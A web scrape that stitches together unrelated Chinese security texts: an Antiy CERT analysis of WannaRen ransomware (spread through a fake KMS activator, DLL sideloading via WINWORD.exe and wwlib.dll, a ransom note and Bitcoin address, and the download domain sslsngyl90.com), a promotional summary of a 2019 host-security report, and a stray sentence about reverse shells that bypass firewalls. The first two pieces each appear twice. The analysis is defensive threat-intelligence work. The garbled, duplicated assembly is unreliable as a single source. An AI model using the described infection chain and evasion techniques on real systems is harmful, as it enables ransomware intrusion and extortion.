1 概述

近日,安天CERT监测到国内多个论坛,贴吧等网站先后有受害者感染新型WannaRen勒索软件并进行求助,其名称与“WannaCry”相似,加密后会追加“.WannaRen”后缀名。

安天CERT捕获了近期关注度较高的WannaRen勒索软件样本,对该威胁事件进行梳理与分析,目前监测到该勒索软件通过KMS工具捆绑PowerShell脚本传播,同时下载另一个PowerShell脚本作为载体,下载相关模块文件,其中包括名为“you”的核心加密文件、“WINWORD.exe”白文件和“wwlib.dll”恶意DLL文件,使用白文件加载恶意DLL文件(俗称白+黑技术)来躲避查杀。勒索信中内容为繁体字,并要求受害者支付赎金完成解密,赎金价格为0.05BTC(约2500元人民币)。目前,被加密的文件在未得到密钥前暂时无法解密。

前导PowerShell脚本除WannaRen核心模块下载链接外,还存在其他多个链接,其中包括永恒之蓝传播模块、挖矿模块。通过安天监测分析,该勒索软件没有大规模传播,没有发现内网传播案例。勒索信中的比特币地址收到两笔入账,约为0.00009490比特币。经验证,安天智甲终端防御系统(简称IEP)可有效阻止WannaRen勒索软件运行过程加密操作,针对勒索软件实体有效防护。

2 该勒索软件对应ATT&CK的映射图谱

该起事件技术特点分布图:

图 2-1该起事件技术特点的ATT&CK的映射

3 WannaRen勒索软件概览

3.1 执行流程

攻击者入侵计算机后,使用PowerShell脚本下载白文件、DLL文件和加密的代码文件。攻击者利用DLL劫持技术,将文件“WINWORD.exe”设置为服务并开机启动,启动后优先加载同目录下的加密程序“wwlib.dll”。DLL文件加载了核心加密文件“you”,加密Windows系统中大部分文件类型,在C:\User\Public目录下释放名为“fm”的文件(内容为记录加密时间),并在桌面释放“团队解密.jpg”、“想解密请看此文本.gif”、“想解密请看此文本.txt”、“@[email protected]exe”等文件。

图 3-1 攻击流程

3.2 信息概览

表 3-1 WannaRen勒索软件概览

image.png

4 样本分析

4.1 样本标签

表 4-1 WannaRen加密程序

image.png

表 4-2 WannaRen解密程序

image.png

4.2 WannaRen加密程序的运行流程

PowerShell脚本将WINWORD.exe和wwlib.dll文件下载到指定目录下,采用白文件加载黑DLL文件方式,利用WINWORD.exe的运行机制,优先加载同目录下的恶意wwlib.dll文件。

图 4-1 两个文件在同一个目录

勒索软件核心文件wwlib.dll与正常的wwlib.dll对比,正常的文件带数字签名,且两个文件大小差异较大。

图 4-2 文件对比

wwlib.dll文件加载后将WINWORD.exe添加为服务。

图 4-3 添加服务

服务启动后,DLL文件读取C\User\Public路径下文件名为you的加密数据,读取后进行加密文件操作。

图 4-4 加密的恶意模块

通过对“you”文件在内存中解密后,发现有如下字符串信息、RSA公钥信息和文件时间戳。

图 4-5勒索模块的字符串

图 4-6 勒索软件RSA公钥

图 4-7 文件头信息

样本运行后在本机释放多个文件,其中包括fm文件(记录攻击时间)、团队解密.jpg(攻击者证明其拥有一个解密团队,实则为取自网络的境外某部队培训图片)、勒索信、@[email protected](解密程序)。

表 4-3 样本释放标签

image.png      

 加密后的文件有如下特点,以“WannaRenkey”字符串开头,“WannaRen2”字符串进行结尾。

图 4-8加密后文件特点

4.3 WannaRen解密程序测试

之前网络大量传播的勒索样本,实则为攻击者声称的解密程序。该程序运行后弹窗,如下图所示:

图 4-9 弹窗显示

通过测试发现,该解密程序从同一目录下的勒索信中读取KEY到解密程序中。

图 4-10 读取勒索信中的KEY

输入任意密码均可弹出“解密完成”对话框,但实则并没有解密。应为解密程序的BUG,或者是根本没有解密的途径。

图 4-11 弹出解密成功对话框

4.4 比特币交易记录

勒索信中的比特币地址为:1NXTgfGprVktuokv3ZLhGCPCjcKjXbswAM,截至本报告发布时,该比特币钱包显示两笔入账记录

图 4-12 比特币交易记录

4.5 关联分析

安天CERT通过关联发现可疑脚本,该PowerShell脚本功能为下载WannaRen勒索软件,经分析该脚本为本次攻击事件的前导文件。

图 4-13 vip.txt脚本内容

目前该脚本除了存在WannaRen核心模块外,还存在其他多个链接,多个文件功能如下表所示,其中包括永恒之蓝传播模块,攻击者可以自由选择下载,目前安天并未监控到存在内网大规模传播现象。

表 4-4 下载的功能模块

image.png

经过关联发现该PowerShell脚本是从域名cs.sslsngyl90.com下载,该域名会重定向至如下链接:cpu.sslsngyl90.com/vip.txt

图 4-14域名重定向

经安天威胁情报综合分析平台关联分析域名sslsngyl90.com,发现该域名与匿影组织存在关联,此前该组织一直进行挖矿攻击,近期较为活跃。

图 4-15安天威胁情报综合分析平台关联分析

目前,该链接中的脚本删除了勒索软件模块,只保留了挖矿模块,故现在没有大规模传播。

图 4-16脚本删除勒索功能

4.6 传播分析

安天监测到该样本通过KMS工具捆绑PowerShell脚本传播,首先攻击者将伪装成激活工具KMS的下载器上传到某网站。

图 4-17 网站截图

该下载器运行后,下载伪装成激活工具KMS的压缩包。

图 4-18 伪装激活工具KMS的压缩包

解压后,是一个伪装成激活工具KMS的程序,其中嵌入PowerShell代码,

图 4-19 嵌入的PowerShell代码

解码后的PowerShell代码如下,具体功能为延迟2000秒,检查系统中是否存在360安全防护或QQ防护,存在则退出PowerShell进程,若不存在则创建下载勒索软件的PowerShell脚本的任务计划。

图 4-20 解码后的PowerShell

将上图中加密后的代码解码,得到以下命令,其功能为下载并执行上一节提到的前导文件。

图 4-21 下载命令

5 防护建议

安天提醒广大用户:

提高网络安全意识,及时进行系统更新和漏洞修复,避免下载非正版的应用软件、非官方游戏及注册机等;

安装具有主动防御能力的终端防护软件(如安天智甲)以对勒索软件提供有效防护;

及时备份重要文件,文件备份应与主机隔离;

尽量避免打开社交媒体分享的不明来源链接,将信任网站添加书签并通过书签访问;

避免使用弱口令或统一的口令;

接收邮件时要确认发送来源是否可靠,避免打开可疑邮件中的网址和附件,避免轻易下载来源不明的附件。

6 IoCs

image.png

1 概述

近日,安天CERT监测到国内多个论坛,贴吧等网站先后有受害者感染新型WannaRen勒索软件并进行求助,其名称与“WannaCry”相似,加密后会追加“.WannaRen”后缀名。

安天CERT捕获了近期关注度较高的WannaRen勒索软件样本,对该威胁事件进行梳理与分析,目前监测到该勒索软件通过KMS工具捆绑PowerShell脚本传播,同时下载另一个PowerShell脚本作为载体,下载相关模块文件,其中包括名为“you”的核心加密文件、“WINWORD.exe”白文件和“wwlib.dll”恶意DLL文件,使用白文件加载恶意DLL文件(俗称白+黑技术)来躲避查杀。勒索信中内容为繁体字,并要求受害者支付赎金完成解密,赎金价格为0.05BTC(约2500元人民币)。目前,被加密的文件在未得到密钥前暂时无法解密。

前导PowerShell脚本除WannaRen核心模块下载链接外,还存在其他多个链接,其中包括永恒之蓝传播模块、挖矿模块。通过安天监测分析,该勒索软件没有大规模传播,没有发现内网传播案例。勒索信中的比特币地址收到两笔入账,约为0.00009490比特币。经验证,安天智甲终端防御系统(简称IEP)可有效阻止WannaRen勒索软件运行过程加密操作,针对勒索软件实体有效防护。

2 该勒索软件对应ATT&CK的映射图谱

该起事件技术特点分布图:

图 2-1该起事件技术特点的ATT&CK的映射

3 WannaRen勒索软件概览

3.1 执行流程

攻击者入侵计算机后,使用PowerShell脚本下载白文件、DLL文件和加密的代码文件。攻击者利用DLL劫持技术,将文件“WINWORD.exe”设置为服务并开机启动,启动后优先加载同目录下的加密程序“wwlib.dll”。DLL文件加载了核心加密文件“you”,加密Windows系统中大部分文件类型,在C:\User\Public目录下释放名为“fm”的文件(内容为记录加密时间),并在桌面释放“团队解密.jpg”、“想解密请看此文本.gif”、“想解密请看此文本.txt”、“@[email protected]”等文件。

图 3-1 攻击流程

3.2 信息概览

表 3-1 WannaRen勒索软件概览

image.png

4 样本分析

4.1 样本标签

表 4-1 WannaRen加密程序

image.png

表 4-2 WannaRen解密程序

image.png

4.2 WannaRen加密程序的运行流程

PowerShell脚本将WINWORD.exe和wwlib.dll文件下载到指定目录下,采用白文件加载黑DLL文件方式,利用WINWORD.exe的运行机制,优先加载同目录下的恶意wwlib.dll文件。

图 4-1 两个文件在同一个目录

勒索软件核心文件wwlib.dll与正常的wwlib.dll对比,正常的文件带数字签名,且两个文件大小差异较大。

图 4-2 文件对比

wwlib.dll文件加载后将WINWORD.exe添加为服务。

图 4-3 添加服务

服务启动后,DLL文件读取C\User\Public路径下文件名为you的加密数据,读取后进行加密文件操作。

图 4-4 加密的恶意模块

通过对“you”文件在内存中解密后,发现有如下字符串信息、RSA公钥信息和文件时间戳。

图 4-5勒索模块的字符串

图 4-6 勒索软件RSA公钥

图 4-7 文件头信息

样本运行后在本机释放多个文件,其中包括fm文件(记录攻击时间)、团队解密.jpg(攻击者证明其拥有一个解密团队,实则为取自网络的境外某部队培训图片)、勒索信、@[email protected](解密程序)。

表 4-3 样本释放标签

image.png      

 加密后的文件有如下特点,以“WannaRenkey”字符串开头,“WannaRen2”字符串进行结尾。

图 4-8加密后文件特点

4.3 WannaRen解密程序测试

之前网络大量传播的勒索样本,实则为攻击者声称的解密程序。该程序运行后弹窗,如下图所示:

图 4-9 弹窗显示

通过测试发现,该解密程序从同一目录下的勒索信中读取KEY到解密程序中。

图 4-10 读取勒索信中的KEY

输入任意密码均可弹出“解密完成”对话框,但实则并没有解密。应为解密程序的BUG,或者是根本没有解密的途径。

图 4-11 弹出解密成功对话框

4.4 比特币交易记录

勒索信中的比特币地址为:1NXTgfGprVktuokv3ZLhGCPCjcKjXbswAM,截至本报告发布时,该比特币钱包显示两笔入账记录

图 4-12 比特币交易记录

4.5 关联分析

安天CERT通过关联发现可疑脚本,该PowerShell脚本功能为下载WannaRen勒索软件,经分析该脚本为本次攻击事件的前导文件。

图 4-13 vip.txt脚本内容

目前该脚本除了存在WannaRen核心模块外,还存在其他多个链接,多个文件功能如下表所示,其中包括永恒之蓝传播模块,攻击者可以自由选择下载,目前安天并未监控到存在内网大规模传播现象。

表 4-4 下载的功能模块

image.png

经过关联发现该PowerShell脚本是从域名cs.sslsngyl90.com下载,该域名会重定向至如下链接:cpu.sslsngyl90.com/vip.txt

图 4-14域名重定向

经安天威胁情报综合分析平台关联分析域名sslsngyl90.com,发现该域名与匿影组织存在关联,此前该组织一直进行挖矿攻击,近期较为活跃。

图 4-15安天威胁情报综合分析平台关联分析

目前,该链接中的脚本删除了勒索软件模块,只保留了挖矿模块,故现在没有大规模传播。

图 4-16脚本删除勒索功能

4.6 传播分析

安天监测到该样本通过KMS工具捆绑PowerShell脚本传播,首先攻击者将伪装成激活工具KMS的下载器上传到某网站。

图 4-17 网站截图

该下载器运行后,下载伪装成激活工具KMS的压缩包。

图 4-18 伪装激活工具KMS的压缩包

解压后,是一个伪装成激活工具KMS的程序,其中嵌入PowerShell代码,

图 4-19 嵌入的PowerShell代码

解码后的PowerShell代码如下,具体功能为延迟2000秒,检查系统中是否存在360安全防护或QQ防护,存在则退出PowerShell进程,若不存在则创建下载勒索软件的PowerShell脚本的任务计划。

图 4-20 解码后的PowerShell

将上图中加密后的代码解码,得到以下命令,其功能为下载并执行上一节提到的前导文件。

图 4-21 下载命令

5 防护建议

安天提醒广大用户:

提高网络安全意识,及时进行系统更新和漏洞修复,避免下载非正版的应用软件、非官方游戏及注册机等;

安装具有主动防御能力的终端防护软件(如安天智甲)以对勒索软件提供有效防护;

及时备份重要文件,文件备份应与主机隔离;

尽量避免打开社交媒体分享的不明来源链接,将信任网站添加书签并通过书签访问;

避免使用弱口令或统一的口令;

接收邮件时要确认发送来源是否可靠,避免打开可疑邮件中的网址和附件,避免轻易下载来源不明的附件。

6 IoCs

image.png

2020开年,一场新冠疫情迅速蔓延,病毒打破了物理边界,对人类社会的发展带来了不可预料的变数。而在陆、海、天、空外的“第五空间”——网络空间,随着物理与虚拟世界的深度融合,未知的威胁不断触碰安全红线,预防网络安全黑天鹅刻不容缓。这其中,对企业而言,主机是承载企业数据和服务的核心,是抗击网络威胁的最后一公里防线,如何解决其安全隐患尤为关键。

为使各行各业的组织机构全面而清晰地了解当前主机安全状况,以及如何守护主机安全。近日,青藤云安全携手中国产业互联网发展联盟(IDAC)、腾讯标准、腾讯安全,共同发布《2019中国主机安全服务报告》。该报告以理论结合实践为指导思想,通过前期大量数据调研,分析当前我国主机安全整体状况、主机安全产品成熟度,为主机安全未来的发展指明了方向。

图片3_副本.png

4个维度20个视角剖析主机整体状况

本报告将从主机资产概况、主机风险分析、主机入侵检测、主机合规分析四个方面详细分析2019年主机安全的整体概况。

清点拥有哪些资产

如果没有完整的、详细的主机资产清单,安全运维团队将无法确保组织机构的安全,因为任何人都无法保护“未知”事物的安全性。本报告通过分析大量的企业级主机核心资产情况,从而为各企业制定安全防护策略提供支持和帮助。

通过统计分析发现,在企业级客户中,超过81.45%的主机使用都是Linux操作系统,只有18.55%主机使用的是Windows操作系统。这其中原因有很多,比如Linux兼容性更好、模块化、资源消耗少等等原因,让很多客户都会选择Linux系统。

图片5.png

图一:不同主机操作系统的使用比例

通过对样本数据的分析可知,74%的主机上都存在UID为0、GID为0、Root/Administrator账号、Sudo权限等特殊账号。这些特殊账号,往往会成为备受黑客青睐的资产,属于高危重点保护资产。

图片6.png

图二:主机特殊账号的使用情况

此外,在样本数据分析中,发现在Linux系统中,使用最多的Web服务应用是Tomcat服务,高达58%,其次是Nginx,使用率达到了32%。

图片7.png

图三:Linux Top5 Web服务的使用情况

而在Windows环境下,IIS使用最多,达到47%,其次是Tomcat,达到36%。另外,Apache和Nginx的使用也占到了一定比例。

图片8.png

图四:Windows Top5 Web服务的使用情况

评估存在什么风险

为了在黑客入侵前发现系统风险点,安全人员需要通过专业的风险评估工具,对风险进行检测、移除和控制,来减小攻击面,包括安全补丁、漏洞、弱密码、应用风险、账号风险等。

基于漏洞所影响的主机数量,发现2019年影响范围最大的TOP10漏洞,有很多都是前几年的漏洞。尤其是针对那些老旧资产,补丁修复更是严重不足,因此,这些漏洞就成为了黑客入侵的突破口。

图片9.png

图五:2019年影响主机TOP10的漏洞

除了漏洞风险之外,在对Web服务器等互联网空间资产做空间测绘后发现,有大量的资产开放了高危端口,存在较高的安全隐患。例如,很多黑客攻击者很喜欢尝试入侵22、3389端口。如果主机存在弱密码登录的情况,很容易就被暴破成功,进而服务器被黑客控制。特别是今年曝光的 BlueKeep(CVE-2019-0708)、Windows RDS(CVE-2019-1181) ,均是Windows 远程桌面服务的漏洞并且危害巨大,而3389又是Windows远程桌面的默认端口,开放3389的Windows服务器更容易受到入侵攻击。建议服务器修改默认的远程连接端口,如无必要,可关闭该端口。

图片10.png

图六:常见高危端口的开放情况

此外,不同服务都有一些具有各自服务特色的弱口令,有一部分是安装时的默认密码。比如MySQL数据库的默认密码为空。通过分析发现,主机软件弱密码主要集中在MySQL、SSH、SVN、Redis、vsftpd这五类应用上,其中MySQL和SSH弱密码问题更是超过了30%。

图片11.png

图七:主机软件弱密码盘点

木马病毒也是主机中最常见的风险,风险木马类软件在各行业的染毒事件中占比最高(40%以上),科技行业相对其他行业感染风险木马软件的比例更小。由于风险木马软件的感染主要是不良的上网习惯及缺乏安全意识引起的(如使用盗版软件或外挂工具等),可能科技行业从业人员的上网安全意识相对更高。

感染型木马在教育行业感染比例相对较高,可能和该行业频繁的文件交互传输有关。

图片12.png

图八:不同行业感染病毒类型分布

后门远控类木马是除了风险软件之外感染量最大的染毒类型,占比在20%左右。后门远控类木马有着极高的隐蔽性,接受远程指令执行信息窃取、截屏、文件上传等操作,对金融科技等信息敏感行业可造成极大危害。

检测存在什么攻击

通过对暴露在公网的服务器做抽样分析发现,在常见的攻击类型中,远程代码执行(RCE)、SQL注入、XSS攻击类型比例较高,同时黑客为了获取服务器、网站的基本信息,常见的探测性扫描(Probe Scan)量同样非常高。

图片13.png

图九:常见主机漏洞

2019年,全国企业用户服务器病毒木马感染事件超百万起。其中Webshell恶意程序感染事件占73.27%;Windows恶意程序感染事件占18.05%;Linux恶意程序感染事件占8.68%。 

 图片14.png

图十:主机感染病毒木马的情况

从感染主机中,总共发现超1万种木马病毒,其中Webshell 约占27%,Windows木马病毒约占61%,Linux木马病毒约占12%。

图片15.png

图十一:病毒木马种类分布

由上文可知,2019年Webshell恶意程序感染事件为近80万起,占所有感染事件的70%。从被感染服务器的数量来看,Windows服务器感染Webshell占所有Windows服务器的约44%,Linux服务器感染Webshell占所有Linux服务器的约0.2%。这说明Windows服务器更容易受到Webshell的攻击。

从感染的Webshell语言类型来看,PHP类型的Webshell是最多的,其次是ASP语言。

图片16.png

图十二:Webshell语言类型的比例分布

此外,在本报告中,根据不同操作系统样本数据进行分析,总共发现超过3000台Windows服务器感染了挖矿木马,其中超2000台Linux服务器感染了挖矿木马。

通过对被感染的主机进行分析,发现挖矿木马主要挖比特币与门罗币。猜测其原因,可能是比特币是数字货币的开创者,其价值非常高,当仁不让地成为黑客的重点关注对象。而门罗币则是新兴的数字货币,由于主要使用CPU进行挖矿,所以黑产团伙喜欢利用入侵服务器进行挖矿。从入侵挖矿时间的角度来看:

Windows平台挖矿事件主要出现的年初(1月-3月)和年底(12月)如下图所示:

图片17.png

图十三:Windows平台挖矿事件月度统计

但是,Linux平台挖矿事件主要集中在年中(4月-6月)和年底(11月-12月):

图片18.png

图十四:Linux平台挖矿事件月度统计

可以看出,无论Windows平台还是Linux平台,年底都是挖矿入侵事件的高发时期,这段时间需要重点关注服务器是否出现CPU占用过高的情况。

判断是否满足合规

所有企事业单位的网络安全建设都需要满足国家或监管单位的安全标准,如等保2.0、CIS安全标准等。安全标准,也称为“安全基线”。安全基线的意义在于为达到最基本的防护要求而制定一系列基准,在金融、运营商、互联网等行业的应用范围非常广泛。通过合规基线进行自查和自加固可以更好地帮助企业认清自身风险现状和漏洞隐患。

主机账号安全性的重要性不言而喻,但是在样本分析过程中,我们仍然发现很多账号存在不合规情况,例如未设置密码尝试次数锁定、未设置密码复杂度限制等,这不符合国家等级保护相关要求。在等保2.0通用基本要求的身份验证控制项中明确要求“应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要求并定期更换”、“应具有登录失败处理功能,应配置并启用结束会话、限制非法登录次数和当登录连接超时自动退出等相关措施”。

图片19.png

图十五:主机账号的不合规情况

此外,主机服务器上承载了非常多的应用,如果应用中存在不合规的情况,例如配置错误、未修补的漏洞补丁等。那么黑客通过应用就能进入主机系统内部,这将带来极大风险。

图片20.png

图十六:常见应用的配置风险

当然,如果没有对主机底层的操作系统进行适当配置,就会引发许多安全问题。建议安全运维人员能够谨慎配置主机来满足组织机构的安全需求,并能够根据需求重新配置。通过研究分析样本数据,发现GRUB密码设置、UMASK值异常、未开启SYN COOKIE这三类问题是所有主机系统风险中所占比例最多的三类。

图片21.png

图十七:主机系统不合规的情况分析

3个层面解读未来主机安全进化方向

正如达尔文《进化论》说,进化来源于突变,而安全面对的正是“不可预知的未来”。主机安全作为网络安全领域中的重要分支,面对难以预测黑客攻击手段,传统的防范、阻止策略已经行不通。

一方面, 攻击者和防守者处于天然不对等的地位,传统基于报警或已存在的威胁特征的检测技术,包括防火墙、IPS、杀毒、沙箱等被动防御手段,更是让这种不平等愈发严重。很多被黑客攻陷的企业组织,虽然已经构建了一定的安全防御体系,但仍然没能及时发现或阻止威胁,将损失降到最低。主要是因为当下检测体系在应对未知威胁过程中存在一些不足,表现为以下几个方面:

· 检测技术单一:基于签名检测技术无法检测未知威胁,更无法定位失陷主机。

· 缺乏持续检测:只能做阶段性检测,无法覆盖威胁的全生命周期。

· 无法进行联动:各安全检测产品独立工作,攻击告警信息割裂,无法联动。

另一方面,当前安全攻防对抗日趋激烈,单纯指望通过防范和阻止的策略已行不通,必须更加注重检测与响应。企业组织要在已遭受攻击的假定前提下,构建集防御、检测、响应和预防于一体的全新安全防护体系。这从2019年6月网络演习的规则也能看得出来,不强制要求系统不被入侵,而是强调入侵之后的快速响应能力。

最后,随着云计算的快速发展,多云和云原生趋势渐渐成为主流,面对多云、云原生等新型架构也不断涌现,原有的主机安全产品如何适配新的架构,也成为了企业不得不考虑的话题。

为了应对外在环境的不断演进,主机安全防护软件也在不断更新迭代,衍生出了一系列细分领域的主机安全产品。从主机安全产品发展级别来看,大体上可以概括为“基础性的主机安全产品”、“以应用为核心的主机安全产品”、“以检测响应为核心的主机安全产品”、“以主动防御为核心的主机安全产品”、“新形态下的主机安全产品”五个阶段。

图片22.png

图十八:主机安全成熟度曲线

我们可以洞见,未来,作为企业基础建设的必需品,主机安全产品只有向“持续检测、快速响应、全面适配”方向发展,才能助力企业更好地应对不可知的未来。

写在最后

《2019中国主机安全服务报告》宏大的理论体系,不仅促进了市场全面理解中国主机安全的现状,且为主机安全的发展指明了方向。

查看完整报告:https://book.yunzhan365.com/sshr/dmga/mobile/index.html

2020开年,一场新冠疫情迅速蔓延,病毒打破了物理边界,对人类社会的发展带来了不可预料的变数。而在陆、海、天、空外的“第五空间”——网络空间,随着物理与虚拟世界的深度融合,未知的威胁不断触碰安全红线,预防网络安全黑天鹅刻不容缓。这其中,对企业而言,主机是承载企业数据和服务的核心,是抗击网络威胁的最后一公里防线,如何解决其安全隐患尤为关键。

为使各行各业的组织机构全面而清晰地了解当前主机安全状况,以及如何守护主机安全。近日,青藤云安全携手中国产业互联网发展联盟(IDAC)、腾讯标准、腾讯安全,共同发布《2019中国主机安全服务报告》。该报告以理论结合实践为指导思想,通过前期大量数据调研,分析当前我国主机安全整体状况、主机安全产品成熟度,为主机安全未来的发展指明了方向。

图片3_副本.png

4个维度20个视角剖析主机整体状况

本报告将从主机资产概况、主机风险分析、主机入侵检测、主机合规分析四个方面详细分析2019年主机安全的整体概况。

清点拥有哪些资产

如果没有完整的、详细的主机资产清单,安全运维团队将无法确保组织机构的安全,因为任何人都无法保护“未知”事物的安全性。本报告通过分析大量的企业级主机核心资产情况,从而为各企业制定安全防护策略提供支持和帮助。

通过统计分析发现,在企业级客户中,超过81.45%的主机使用都是Linux操作系统,只有18.55%主机使用的是Windows操作系统。这其中原因有很多,比如Linux兼容性更好、模块化、资源消耗少等等原因,让很多客户都会选择Linux系统。

图片5.png

图一:不同主机操作系统的使用比例

通过对样本数据的分析可知,74%的主机上都存在UID为0、GID为0、Root/Administrator账号、Sudo权限等特殊账号。这些特殊账号,往往会成为备受黑客青睐的资产,属于高危重点保护资产。

图片6.png

图二:主机特殊账号的使用情况

此外,在样本数据分析中,发现在Linux系统中,使用最多的Web服务应用是Tomcat服务,高达58%,其次是Nginx,使用率达到了32%。

图片7.png

图三:Linux Top5 Web服务的使用情况

而在Windows环境下,IIS使用最多,达到47%,其次是Tomcat,达到36%。另外,Apache和Nginx的使用也占到了一定比例。

图片8.png

图四:Windows Top5 Web服务的使用情况

评估存在什么风险

为了在黑客入侵前发现系统风险点,安全人员需要通过专业的风险评估工具,对风险进行检测、移除和控制,来减小攻击面,包括安全补丁、漏洞、弱密码、应用风险、账号风险等。

基于漏洞所影响的主机数量,发现2019年影响范围最大的TOP10漏洞,有很多都是前几年的漏洞。尤其是针对那些老旧资产,补丁修复更是严重不足,因此,这些漏洞就成为了黑客入侵的突破口。

图片9.png

图五:2019年影响主机TOP10的漏洞

除了漏洞风险之外,在对Web服务器等互联网空间资产做空间测绘后发现,有大量的资产开放了高危端口,存在较高的安全隐患。例如,很多黑客攻击者很喜欢尝试入侵22、3389端口。如果主机存在弱密码登录的情况,很容易就被暴破成功,进而服务器被黑客控制。特别是今年曝光的 BlueKeep(CVE-2019-0708)、Windows RDS(CVE-2019-1181) ,均是Windows 远程桌面服务的漏洞并且危害巨大,而3389又是Windows远程桌面的默认端口,开放3389的Windows服务器更容易受到入侵攻击。建议服务器修改默认的远程连接端口,如无必要,可关闭该端口。

图片10.png

图六:常见高危端口的开放情况

此外,不同服务都有一些具有各自服务特色的弱口令,有一部分是安装时的默认密码。比如MySQL数据库的默认密码为空。通过分析发现,主机软件弱密码主要集中在MySQL、SSH、SVN、Redis、vsftpd这五类应用上,其中MySQL和SSH弱密码问题更是超过了30%。

图片11.png

图七:主机软件弱密码盘点

木马病毒也是主机中最常见的风险,风险木马类软件在各行业的染毒事件中占比最高(40%以上),科技行业相对其他行业感染风险木马软件的比例更小。由于风险木马软件的感染主要是不良的上网习惯及缺乏安全意识引起的(如使用盗版软件或外挂工具等),可能科技行业从业人员的上网安全意识相对更高。

感染型木马在教育行业感染比例相对较高,可能和该行业频繁的文件交互传输有关。

图片12.png

图八:不同行业感染病毒类型分布

后门远控类木马是除了风险软件之外感染量最大的染毒类型,占比在20%左右。后门远控类木马有着极高的隐蔽性,接受远程指令执行信息窃取、截屏、文件上传等操作,对金融科技等信息敏感行业可造成极大危害。

检测存在什么攻击

通过对暴露在公网的服务器做抽样分析发现,在常见的攻击类型中,远程代码执行(RCE)、SQL注入、XSS攻击类型比例较高,同时黑客为了获取服务器、网站的基本信息,常见的探测性扫描(Probe Scan)量同样非常高。

图片13.png

图九:常见主机漏洞

2019年,全国企业用户服务器病毒木马感染事件超百万起。其中Webshell恶意程序感染事件占73.27%;Windows恶意程序感染事件占18.05%;Linux恶意程序感染事件占8.68%。 

 图片14.png

图十:主机感染病毒木马的情况

从感染主机中,总共发现超1万种木马病毒,其中Webshell 约占27%,Windows木马病毒约占61%,Linux木马病毒约占12%。

图片15.png

图十一:病毒木马种类分布

由上文可知,2019年Webshell恶意程序感染事件为近80万起,占所有感染事件的70%。从被感染服务器的数量来看,Windows服务器感染Webshell占所有Windows服务器的约44%,Linux服务器感染Webshell占所有Linux服务器的约0.2%。这说明Windows服务器更容易受到Webshell的攻击。

从感染的Webshell语言类型来看,PHP类型的Webshell是最多的,其次是ASP语言。

图片16.png

图十二:Webshell语言类型的比例分布

此外,在本报告中,根据不同操作系统样本数据进行分析,总共发现超过3000台Windows服务器感染了挖矿木马,其中超2000台Linux服务器感染了挖矿木马。

通过对被感染的主机进行分析,发现挖矿木马主要挖比特币与门罗币。猜测其原因,可能是比特币是数字货币的开创者,其价值非常高,当仁不让地成为黑客的重点关注对象。而门罗币则是新兴的数字货币,由于主要使用CPU进行挖矿,所以黑产团伙喜欢利用入侵服务器进行挖矿。从入侵挖矿时间的角度来看:

Windows平台挖矿事件主要出现的年初(1月-3月)和年底(12月)如下图所示:

图片17.png

图十三:Windows平台挖矿事件月度统计

但是,Linux平台挖矿事件主要集中在年中(4月-6月)和年底(11月-12月):

图片18.png

图十四:Linux平台挖矿事件月度统计

可以看出,无论Windows平台还是Linux平台,年底都是挖矿入侵事件的高发时期,这段时间需要重点关注服务器是否出现CPU占用过高的情况。

判断是否满足合规

所有企事业单位的网络安全建设都需要满足国家或监管单位的安全标准,如等保2.0、CIS安全标准等。安全标准,也称为“安全基线”。安全基线的意义在于为达到最基本的防护要求而制定一系列基准,在金融、运营商、互联网等行业的应用范围非常广泛。通过合规基线进行自查和自加固可以更好地帮助企业认清自身风险现状和漏洞隐患。

主机账号安全性的重要性不言而喻,但是在样本分析过程中,我们仍然发现很多账号存在不合规情况,例如未设置密码尝试次数锁定、未设置密码复杂度限制等,这不符合国家等级保护相关要求。在等保2.0通用基本要求的身份验证控制项中明确要求“应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要求并定期更换”、“应具有登录失败处理功能,应配置并启用结束会话、限制非法登录次数和当登录连接超时自动退出等相关措施”。

图片19.png

图十五:主机账号的不合规情况

此外,主机服务器上承载了非常多的应用,如果应用中存在不合规的情况,例如配置错误、未修补的漏洞补丁等。那么黑客通过应用就能进入主机系统内部,这将带来极大风险。

图片20.png

图十六:常见应用的配置风险

当然,如果没有对主机底层的操作系统进行适当配置,就会引发许多安全问题。建议安全运维人员能够谨慎配置主机来满足组织机构的安全需求,并能够根据需求重新配置。通过研究分析样本数据,发现GRUB密码设置、UMASK值异常、未开启SYN COOKIE这三类问题是所有主机系统风险中所占比例最多的三类。

图片21.png

图十七:主机系统不合规的情况分析

3个层面解读未来主机安全进化方向

正如达尔文《进化论》说,进化来源于突变,而安全面对的正是“不可预知的未来”。主机安全作为网络安全领域中的重要分支,面对难以预测黑客攻击手段,传统的防范、阻止策略已经行不通。

一方面, 攻击者和防守者处于天然不对等的地位,传统基于报警或已存在的威胁特征的检测技术,包括防火墙、IPS、杀毒、沙箱等被动防御手段,更是让这种不平等愈发严重。很多被黑客攻陷的企业组织,虽然已经构建了一定的安全防御体系,但仍然没能及时发现或阻止威胁,将损失降到最低。主要是因为当下检测体系在应对未知威胁过程中存在一些不足,表现为以下几个方面:

· 检测技术单一:基于签名检测技术无法检测未知威胁,更无法定位失陷主机。

· 缺乏持续检测:只能做阶段性检测,无法覆盖威胁的全生命周期。

· 无法进行联动:各安全检测产品独立工作,攻击告警信息割裂,无法联动。

另一方面,当前安全攻防对抗日趋激烈,单纯指望通过防范和阻止的策略已行不通,必须更加注重检测与响应。企业组织要在已遭受攻击的假定前提下,构建集防御、检测、响应和预防于一体的全新安全防护体系。这从2019年6月网络演习的规则也能看得出来,不强制要求系统不被入侵,而是强调入侵之后的快速响应能力。

最后,随着云计算的快速发展,多云和云原生趋势渐渐成为主流,面对多云、云原生等新型架构也不断涌现,原有的主机安全产品如何适配新的架构,也成为了企业不得不考虑的话题。

为了应对外在环境的不断演进,主机安全防护软件也在不断更新迭代,衍生出了一系列细分领域的主机安全产品。从主机安全产品发展级别来看,大体上可以概括为“基础性的主机安全产品”、“以应用为核心的主机安全产品”、“以检测响应为核心的主机安全产品”、“以主动防御为核心的主机安全产品”、“新形态下的主机安全产品”五个阶段。

图片22.png

图十八:主机安全成熟度曲线

我们可以洞见,未来,作为企业基础建设的必需品,主机安全产品只有向“持续检测、快速响应、全面适配”方向发展,才能助力企业更好地应对不可知的未来。

写在最后

《2019中国主机安全服务报告》宏大的理论体系,不仅促进了市场全面理解中国主机安全的现状,且为主机安全的发展指明了方向。

查看完整报告:https://book.yunzhan365.com/sshr/dmga/mobile/index.html

目前,我们有很多种方法可以创建一个反向Shell,并尝试绕过防火墙以成功控制远程设备。但实际上,传出的连接并不一定都会被过滤。

